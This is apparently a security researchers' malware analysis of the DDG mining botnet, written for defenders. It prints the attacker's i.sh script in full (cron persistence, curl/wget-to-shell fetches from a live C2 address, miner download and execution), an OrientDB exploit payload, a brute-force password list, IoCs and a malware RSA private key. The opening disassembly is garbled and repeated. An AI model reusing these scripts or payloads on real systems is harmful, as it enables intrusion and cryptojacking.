; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph wh+vor_56], 0 ixploit_doPriv ; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph wh+var_58], eax wh+vor_56], 1 wh+var_60], 8 win_Exploit_doPriv_ptr wh+var_56], ecx e_deferproc lass::ofunction,"@version::0,"@rid":"#-1:-1","idempotent":n'</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F80 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224F90 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FC4 .text:08224FC9 .text:08224FC9 .text:08224FC0 .text:08224FC0 .text:08224FC0 .text:08224FE0</pre>	loc_821D716: sub mov mov mov mov call mov mov test jnz mov mov mov mov mov mov mov call mov mov mov call RCE_Exp	<pre>lea cmp jbe esp, 60 [esp+60 eax, [e loc_822 loc_82 loc_8 loc_82 loc_8 loc_8</pre>	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15] short loc_821D6EB h bh+arg_4], 0 bh+arg_8], 0 esp+60h+arg_0] bh+var_60], eax ixploit_ListDatabases ; /listDatabases esp+60h+arg_0] bh+var_60], eax bh+var_5C], 0 ixploit_doPriv ; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph esp+60h+arg_0] bh+var_58], eax bh+var_58], eax bh+var_58], eax bh+var_58], eax bh+var_50], 8 min_Exploit_doPriv_ptr bh+var_5C], ecx edeferproc lass":"ofunction", "@version":0,"@rid":"#-1:-1","idempotent":n' ; DATA XREF: main_Exploit_DoAll+146fo</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D717 .text:0821D717 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F91 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FC4 .text:08224FC4 .text:08224FC9 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE4 .rodata:082B2D9A .rodata:082B2D9A</pre>	loc_821D716: sub mov mov mov mov call mov mov call mov mov mov mov call mov mov mov call RCE_Exp	<pre>lea cmp jbe esp, 60 [esp+60 eax, [e e</pre>	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15] short loc_821D6EB h bh+arg_4], 0 bh+arg_8], 0 esp+60h+arg_0] bh+var_60], eax ixploit_ListDatabases ; /listDatabases esp+60h+var_58] esp+60h+arg_0] bh+var_60], eax h+var_60], eax h+var_50], 0 ixploit_doPriv ; check pri:</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F80 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224F90 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FC4 .text:08224FC4 .text:08224FC9 .text:08224FC0 .text:08224FC0 .text:08224FC0 .text:08224FC0 .text:08224FC0 .text:08224FC0 .text:08224FC0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FEA .rodata:082B2D9A .rodata:082B2D9A .rodata:082B2D9A</pre>	loc_821D716: sub mov mov mov mov call mov mov call mov mov mov mov call mov mov mov call RCE_Exp	<pre>lea cmp jbe esp, 60 [esp+60 eax, [e e</pre>	<pre>; CODE XREF: ddg_target_New_func1+1F9†j ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h+arag_1, 0 b+arag_1, 0 b+</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D717 .text:0821D717 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F91 .text:08224F91 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FC0 .text:08224FC1 .text:08224FC1 .text:08224FC1 .text:08224FC1 .text:08224FC1 .text:08224FC3 .text:08224FC3 .text:08224FC3 .text:08224FC4 .text:08224FC4 .text:08224FC4 .text:08224FC5 .text:08224FC4 .text:08224FC5 .</pre>	loc_821D716: sub mov mov mov mov call mov mov mov mov mov mov mov mov	<pre>lea cmp jbe esp, 60 [esp+60 eax, [e e</pre>	<pre>; CODE XREF: ddg_target_New_func1+1F9†j ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h+arg_8], 0 b+arg_8], 0 b+arg_8], 0 b+arg_8], 0 b+arg_8], 0 b+arg_8], 0 b+arg_8], 0 b+arg_8], 0 ssp+60h+arg_9] b+var_60], eax b+var_50], 0 ixploit_doPriv ; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph esp+60h+arg_0] b+var_51, 0 ixploit_doPriv ; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph esp+60h+arg_0] b+var_51, 2 b+var_51, 1 b+var_51, eax b+var_51, 2 cdeferproc lass::"ofunction","@version":0,"@rid":"#-1:-1","idempotent":n' ; DATA XREF: main_Exploit_DoAll+146fo 'name':"%s","language":"groovy","code":"File file = new File(' mp/hello.sh\");file << (\"curl -fsSL http://218.248.40.228:84' ssh l sh\");def proc = \"sh /tmp/hello.sh\".execute();","para' ss":mull}</pre>

Stage 1

Here is the main configuration URL of DDG, the IP 218.248.40.228 is located in India, AS9829:

hxxp://218.248.40.228:8443/i.sh

This **i.sh** has changed many times, but the content is more or less the same, below is an early version, with following main functions:

- Synchronize local Crontab with i.sh from the C2 server
- · Download and execute DDG sample from the C2 server
- Check and clear the old version of the local DDG process

export PATH=\$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

```
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.2011" ]; then
   curl -fsSL http://218.248.40.228:8443/2011/ddg.$(uname -m) -o /tmp/ddg.2011
fi
chmod +x /tmp/ddg.2011 && /tmp/ddg.2011
#if [ ! -f "/tmp/ss2480.2" ]; then
    #curl -fsSL http://218.248.40.228:8443/ss2480.2 -o /tmp/ss2480.2
#fi
#chmod +x /tmp/ss2480.2 && /tmp/ss2480.2
ps auxf | grep -v grep | grep ss2480.1 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ss22522.1 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ss22522.2 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.1010 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.1021 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2001 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2003 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2004 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2005 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2011 || rm -rf /tmp/ddg.2011
```

The **i.sh** script gives attacker very flexible control to deliver any malicious software to the compromised host. And we did see this file change from time to time to serve new Trojan files or to deliver malware that incorporates new attacks. For example:

- DDG Samples: the ddg.\$(uname -m) series. This the long-run payload, we have seen three version, V2011, V2020 and V2021
- ss22522 Samples: Only work for a short period, against the Struts2 vulnerability S2-052
- ss2480 Samples: Also for a short period too, against OrientDB RCE. This is the very sample exposed DDG to us

By the way there is an issue in early version of **i.sh**, where a "xargs" is missing just ahead of 'kill' command, so the older process will not get killed as intended. This issue is fixed in later version.

On 2018.1.3, the attacker pushed out the newest version of i.sh (v2021.2), adding another mining process imWBR1, which uses the second XMR wallet listed earlier:

export PATH=\$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

```
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -0- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.2021" ]; then
    curl -fsSL http://218.248.40.228:8443/2021/ddg.$(uname -m) -o /tmp/ddg.2021
fi
if [ ! -f "/tmp/ddg.2021" ]; then
    wget -q http://218.248.40.228:8443/2021/ddg.$(uname -m) -0 /tmp/ddg.2021
fi
chmod +x /tmp/ddg.2021 && /tmp/ddg.2021
if [ ! -f "/tmp/imWBR1" ]; then
    curl -fsSL http://218.248.40.228:8443/imWBR1 -o /tmp/imWBR1 --compressed
fi
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
```

Stage 2

At this phase, DDG tries to test all the hosts in the hub_iplist.txt, and if success DDG will visit hxxp://hub_ip:8443/wnTKYg to download and execute the corresponding program wnTKYg Miner (if the native CPU does not support AES-the NI, it will download wnTKYg.noaes).

All the ddg.xxx and ss2480.xxx were written in Golang. DDG communicate to the HUB with a third party Golang Stream Multiplexing library Smuxcompleted. The default Smux configuration is been used.

So after DDG downloads Miner from the HUB and starts to KeepAlive, it sends 2 packets to the connected HUB IP every 10s:

11:09:22.912704		202.181.169.98	TCP	62	47434 → 8443 [PSH,
11:09:23.483352		202.181.169.98	TCP	54	47434 → 8443 [ACK]
11:09:32.917224		202.181.169.98	ТСР	62	47434 → 8443 [PSH,
11:09:33.486878		202.181.169.98	TCP	54	47434 → 8443 [ACK]
11:09:42.911763		202.181.169.98	TCP	62	47434 → 8443 [PSH,
11:09:45.481974		202.181.169.98	TCP	54	47434 → 8443 [ACK]
11:09:52.916288		202.181.169.98	TCP	62	47434 → 8443 [PSH,
11:09:53.484725		202.181.169.98	TCP	54	47434 → 8443 [ACK]
11:10:02.910823		202.181.169.98	TCP	62	47434 → 8443 [PSH,
11:10:03.503481		202.181.169.98	TCP	54	47434 → 8443 [ACK]
11:10:12.915359		202.181.169.98	TCP	62	47434 → 8443 [PSH,
11:10:22.217194		202.181.169.98	TCP	54	47434 → 8443 [ACK]
11:10:22.919914		202.181.169.98	TCP	62	47434 → 8443 [PSH,
11:10:23.772809		202.181.169.98	TCP	54	47434 → 8443 [ACK]
11:10:32.914413		202.181.169.98	TCP	62	47434 → 8443 [PSH,
11:10:37.696708		202.181.169.98	TCP	54	47434 → 8443 [ACK]
11:10:42.918945		202.181.169.98	TCP	62	47434 → 8443 [PSH,
11:10:43.796426		202.181.169.98	TCP	54	47434 → 8443 [ACK]
11:10:52.913516		202.181.169.98	TCP	62	47434 → 8443 [PSH,
11:10:53.800031		202.181.169.98	TCP	54	47434 → 8443 [ACK]

The Built-in Hub_iplist.txt

The original **DDG sample download URL** is hxxp://218.248.40.228:8443/2011/ddg.\$(uname -m), as written in i.sh. There are 158 hub_ip:8443 and 3 hub_domain:8443 listed in the hub_iplist, two of which are unregistered and then registered by us.

On 2017-11-10 We found that there is a change in the contents of i.sh file, ddg sample download link has changed to hxxp://218.248.40.228:8443/2020/ddg.\$(uname -m). The attacker replaced all HUP IPs and domain names including ours. The latest contents of hub_iplist.txt can be seen at the bottom of this blog ip_hublist (v2020 ~ v2021).

DDG Mining Botnet Also Targeted Redis Database and SSH Service

The above analysis focuses on the OrientDB exploit (ss2480 series).

In fact, the DDG samples also target SSH and Redis services as well, which are another two major methods used by DDG to compromise vulnerable hosts. Some of the related functions and the password dictionary are shown in the following two figures:

Function name	
f ddg aaredis NewRedisDog	
f ddg aaredis dog Eat	
f ddg aaredis dog EatPort	
f ddg aaredis Server Start	
f ddg aaredis Server Stop	
f ddg aaredis Server Status	
f ddg aaredis Args Reset	
f ddg aaredis Args String	
f ddg aaredis. Args Descriptor	
f ddg aaredis Result Reset	
f ddg aaredis Result String	
f ddg_aaredis_Result_Descriptor	
f ddg aaredis init 1	
f ddg aaredis Register AARedis Server	
f ddg aaredis_AARedis Start Handler	
dug_aareuis_AAreuis_start_Handler	
dog_aaredis_AARedis_stop_Handler	
J dog_aaredis_AARedis_status_Handler	
7 ddg_aaredis_init_2	
7 ddg_aaredis_dog_EatPort_func1	
7 ddg_aaredis_AARedis_start_Handler_func1	
f ddg_aaredis_AARedis_Stop_Handler_func1	
f ddg_aaredis_AAkedis_Status_Handler_func1	
f ddg_aaredis_init	
f type_hash_structFuintptr_ddg_aaredis_password_strin	g_ddg_aaredis_addrstring
f type_eq_structFuintptr_ddg_aaredis_password_string_	ddg_aaredis_addrstring
f type_hash_ddg_aaredis_Args	
f type_eq_ddg_aaredis_Args	
f type_hash_structFuintptr_ddg_aaredis_srvinterface	
<u>f</u> type_eq_structFuintptr_ddg_aaredis_srvinterface	
f ddg_aassh_NewDog	
<u>f</u> ddg_aassh_dog_Eat	
<u>f</u> ddg_aassh_dog_EatPort	
<u>f</u> ddg_aassh_Server_Start	
<u>f</u> ddg_aassh_Server_Stop	
f ddg_aassh_Server_Status	
f ddg_aassh_NA_String	
f ddg_aassh_NA_Descriptor	
f ddg_aassh_Args_Reset	
f ddg_aassh_Args_String	
f ddg_aassh_Args_Descriptor	
f ddg_aassh_Result_Reset	
f ddg_aassh_Result_String	
f ddg_aassh_Result_Descriptor	
.rodata:0000000000A52F22 dict 0	
	; DATA XREF: .data:off_D4C1C0 i o
	b 'SDzxc123Abc\$%^123Asd!@#123Asd\$%^123Asd456123Azertv123Cin353123Den'
	b 'nis1230WF1@#1230WF1231230WFASD1230WF7XC1230WFasd1230WFagz1230WFaw'
	b 'e1230WEzxc1230gz\$%^1230we1@#1230we\$%^1230we4561230we@@@1230wer+v1'
	+ 1237X(10#1237X(1231237X(2xc1237xc123123a, 123a123aaazzz123abc10#123)
	h *c765123abc780123abc800123abc800123abc087123abc08C123abc08C123abc08C004123ab
	ID WEIZSIZSUWESZIIZSUWE4SUIZSUWEASUIZSUWEASUIZSUWEVAZIZSUWEVWEIZSUWEV
	D ZACIZSYWedSuIZSYWedWeIZSYWerTYIZSYWErTZIZSYWEZSCIZSSERVERIZSTHEIZ
	D 237XCqSq1237XCVbn124578369124578963

The victim is also implanted with the X509 key files. Three key files built into the sample are as follows, details at the end of the article:

- 1. slave.pem
- 2. ca.pem
- 3. slave.key

Looking at historical data, we can also see the i.sh host **218.248.40.228** scanning the Redis database early on. A google search turned up some posts complaining their server was infested with ddg botnet. The following diagram shows the ports that were scanned by 218.248.40.228 between 2017-09-27 20:00:00 ~ 2017-10-25 11:00:00. Port 6379, 7379 and 2480 represents Redis, Redis (Replicas) and OrientDB:



One more thing

Starting from 2018.1.25 at 21 o'clock (GMT+8), we saw another update of this botnet, with link hxxp://218.248.40.228:8443/2011/ddg.x86_64, and this time it deliveries a Mirai family sample.

- Family : mirai
- C2 : linuxuclib.com:8080
- C2 : jbeupq84v7.2y.net, no IP address associated yet
- MD5 : cbc4ba55c5ac0a12150f70585af396dc

loC

C2:

202.181.169.98:8443 218.248.40.228:8443 linuxuclib.com:8080 jbeupq84v7.2y.net

Samples' MD5:

b1201bf62f3ca42c87515778f70fd789	ddg.i686	>	v2011
7705b32ac794839852844bb99d494797	ddg.x86_64	>	v2011
1970269321e3d30d6b130af390f2ea5c	ddg.i686	>	v2020
5751440a2b3ce1481cf1464c8ac37cbe	ddg.x86_64	>	v2020
f52f771c5b40a60ce344d39298866203	ddg.i686	>	v2021
3ea75a85bab6493db39b1f65940cc438	ddg.x86_64	>	v2021
b0c6cefa1a339437c75c6b09cefeb2e8	ss2480.1		
8c31b6379c1c37cf747fa19b63dd84a1	ss2480.2		
4fc28b8727da0bcd083a7ac3f70933fa	ss22522.2		
d3b1700a413924743caab1460129396b	wnTKYg		
8eaf1f18c006e6ecacfb1adb0ef7faee	wnTKYg.noae	es	
9ebf7fc39efe7c553989d54965ebb468	imWBR1		

Sample Downloading URL

hxxp://218.248.40.228:8443/2011/ddg.i686 hxxp://218.248.40.228:8443/2011/ddg.x86_64 hxxp://218.248.40.228:8443/2020/ddg.i686 hxxp://218.248.40.228:8443/2020/ddg.x86_64 hxxp://218.248.40.228:8443/2021/ddg.i686 hxxp://218.248.40.228:8443/2021/ddg.x86_64 hxxp://218.248.40.228:8443/i.sh hxxp://218.248.40.228:8443/ss22522.2 hxxp://218.248.40.228:8443/ss2480.1 hxxp://218.248.40.228:8443/ss2480.2 hxxp://218.248.40.228:8443/wnTKYg hxxp://202.181.169.98:8443/2011/ddg.i686 hxxp://202.181.169.98:8443/2011/ddg.x86_64 hxxp://202.181.169.98:8443/i.sh hxxp://202.181.169.98:8443/ss22522.2 hxxp://202.181.169.98:8443/ss2480.1 hxxp://202.181.169.98:8443/ss2480.2 hxxp://202.181.169.98:8443/wnTKYa hxxp://218.248.40.228:8443/imWBR1

ip_hublist(v2011): ip_hublist__2011.txt

ip_hublist(v2020~v2021): ip_hublist__2020.txt

Three Key files

slave.pem

----BEGIN CERTIFICATE-----

MIICozCCAYSCCQDFoT3X3cNwiDANBgkqhkiG9w0BAQsFADATMREwDwYDVQQDDAh3 ZS1hcy1jYTAeFw0xNzA3MTcwMTM2MjhaFw0yNzA3MTUwMTM2MjhaMBQxEjAQBgNV BAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAN1w 9s7u1BrQSxJEkqCkJLl+qnw4XPL+GgCimso6WWvie8gr3AFiSDUFMVsb001GVXJD CAaYStw6Wkn09cjAczNW9Ysq4EOurpGmCDdViftu+5zu2Zmz88p1/ta3BuytQ1fE Q116TFjNLSPOAaTwaWcQFXN/01CPJZ7wvdo5aXFgVkvFp1XogQiFLdKn3PgtDiNy EZct1/GgkYkgMTiymGrhXyj6/Eca28IsTydwU5h2fkkAIwnYpyeeEdcxsLmmFmFE G5x1mNsmUPnvMU7/qULmchVJ16pne06rNREApbuhm/XrhaDjphK8CNbUDWNXCWIR SKU15bMoq5XnrvKc98kCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAg/G9vqIRz4rC niH49gSwFzBhH9tCXyBtHj86Mb2hi9myzFGE4j0MhWp70K31wWq18kbukPk0TBz N9Mxrvvr0REBMPa1Q7VAq5ouFHw4WcIyzi1Ksw0SmFjaRCGqJTWQnG8lz+a1N8NX /i1KBWPbrnZGFfLdcKUmKrIXt6I3S1kb3jhJv1TOTjfr/iP1AMjVE9+tdgmy0Bsh Mon9ctFwFj0sLhkcuyXU33ItkX5am2qmG7ToCOUj855JEm06T6PSakRLvodAsZfp Jmt01aFj1/7HS5Imc0rd1WWXU76cSZN5GENRcsIzmA3pq6dVKFfSwsA0Mw5zQcTS uDpcOCRjJa==

----END CERTIFICATE-----

ca.pem

----BEGIN CERTIFICATE-----

MIIC/DCCAeSgAwIBAgIJAK1DRcYUFowVMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV BAMMCHdlLWFzLWNhMB4XDTE3MDcxNzAxMzYyOFoXDTQ0MTIwMjAxMzYyOFowEzER MA8GA1UEAwwId2UtYXMtY2EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB AQCz6Iaprhnb68CEPCJzU1uCplIMQWuMtpuamV/M4T1G0A0qPHLsCPbnS+psuSwK Tnp3XBDEdTbhm33/FfLXeEfEmJlVX4lJfPk7XPT/UwgJ10gGVegxNndPd+FQf1oX 5ePSEmGZQRy9gkRQtCpSm011A08bbZY+WhHzvb3VQmu6rBAVCnzhPmBBlXsoyJfI oRVX5FEwCMZXuKHVd2N/Q8XBEFX6TGICEAwSCu69QYG7eFMleLgCxFRJ1x0XfPvD x++depGUDpR9PrsTQ60h3BIicuWHfj72tiooVW1mGG8yAqDfb1kBa5gq8jZM13Nx gK0aRbZiJFreFj8Ed05LlPdnAgMBAAGjUzBRMB0GA1UdDg0WBBRL9zCbPXsgyxFe oZYZtZmjvAyqbDAfBgNVHSMEGDAWgBRL9zCbPXsgyxFeoZYZtZmjvAyqbDAPBgNV HRMBAf8EBTADAOH/MA0GCSqGSIb3DQEBCwUAA4IBAQBFne95zt54uyUn2ZtdUUHH Oh30DsCx+hL4DWsyaVa119PTW1es58+VGPFr4JYKj5DDj1FebYW/k0DAt6G4ehVg pfYW23lYbwfbs1gFKaUVX1gb0U0BsLlXGJ5dVlnY09Z3RGZ1nf0U6VgTbleDc/M6 Cax7dvyn2a+2BJLxl3QCUVye6PJw33Hjjl8xfMTEv3RKoxeYP0Prgrmmg/gmr7hs doWJBMflCWmwZJKhtdYAKMkFnprNH4h8ryqsWe0928ZHbHbxej15Rv9BjXIg4XnF tEIvhZUJ3tj40vK8X6hJf0ZsI/3H1ffvTHyIX4UnYgGqMFlHSBXMh0IiXed6+xsP ----END CERTIFICATE-----

slave.key

-----BEGIN RSA PRIVATE KEY-----

MIIEowIBAAKCAQEA3XD2zu7UGtBLEkSSoKQkuX6qfDhc8v4aAKKayjpZa+J7yCvc AWJINQUxWxs46UZVckMIBphK3DpaSfT1yMBzM1b1iyrgQ66ukaYIN1WJ+277n07Z mbPzynX+1rcG7K1CV8RCWXogWM0tI84BojBpZxAVc386UI8lnvC92jlpcWBWS8Wm VeiBCIUt0qfc+C00I3IRly3X8aCRiSAx0LKYauFfKPr8RxrbwixPJ3BTmHZ+SQAj CdinJ54R1zGwuaYWZ8QbnHWY2yZQ+e8xTv+pQuZyFUnXqmd7Tqs1EQClu6Gb9euF oOOmErwI1tQNY1cJYhFIpSXlsyirleeu8pz3yQIDAQABAoIBAQCTltbo1QVJWcqv QkT4DG7tsx6t7GMHEZUDF11Tq9Att6YIpDLe0UMnE27x6hLkZ5xLq6GNw7MhVUMY R8wJITum3C6LsugGNEbljGOtfbWZfz700b20VAIIztwq/5H97PxqwsP2Hw+wIBAV 7RfpoZgetnmVoRac2suYQ5xF9j3w8acpCZdU2jCvbMNADd0tCkXBXcD9nGU0d9dN Z+gajp7otDw1DbQ381x6YDEu0g9CJhXdVfqK0sk0s9KTrATxLBw4u6UmIP7fNAoH p90Xzp6qzz14mLR05SWm1pcjuoqxL88wIPYtcfKo8Z4CxZhx2oPTiQ0JUiVHUvPh OZwu2GSBAoGBAPFscP0Dr2H4dFFKK6uYb2ZRY6WS0iL31o1LCZ3a4lDJS7fvncZK OiyG/RQIt0k68UQHNxte0VOHiaGqCaHlfikS/KN5WyQeaRmH+MKxp+atGvKXmURV +uWK37GCIDzqTDPtu9UiAxQ00JQZCvGh40lc35v2aJGKpkD4+IaEDpDXAoGBAOrP qpei2+DtwougNA9FTxS3Z34NCCIHT0rgoogZZirMy6M7LnUoWAgMIUjpENK7uxma nNEWagv5XrLmFbjC/UaTF5BR9CrX0orto2CNA2upN+7Y6wNnB1ed7sjLubDEPNXv JeZsoz4G7TDq9oXE54a8idFVePn8q1RdRvH0dYhfAoGAbMgqF0+vJPvonYBIMSec eoQN3FsJKxx1ZnD7Qk+QTkqFfbnQY7qqf8nLWy2a0LsAX2DI6eJNe8/Eqj2N3Y8k y6ksgRR7hsjVHpXv9vpJ51z0mX7Jpsr/JFLw/HDfydLgxz1Ft4F91Zma0NB/5+TE HxhkAUiEUaAhzYDhquryDT0CgYAP0YOdiYQkh//mJhm7uaCVNbHMJRaaLEHkOyBN 60AgHAHP8kmz7M7ZY+/0GJ1ghPMay3arA0aLnfYK0UPXWZN0cK5Ss6KuTDHL2Cx8 caN8Wj8BYS2b4hH1jhcrAcZ1qRKsGttDxafNouvRstJ+uoAabJMgPhDTTnlASrRf z9fNIwKBgCM3UzxVsRyoYx7rpCQ7QSX6SHsM0cNjWDRw5aMziQmyI+sitw0PAVek 0+XvIXIzdahNBhQQ0giFKWh/b7fq2aNB1J+5TtAcEFTFFk9LC31/U7Mk0nhUsh6G pEcsRlnc4GpFeelJtj/c1BHBbX7HSdB8osk3GDyUwX1KVlbxZ4dk -----END RSA PRIVATE KEY-----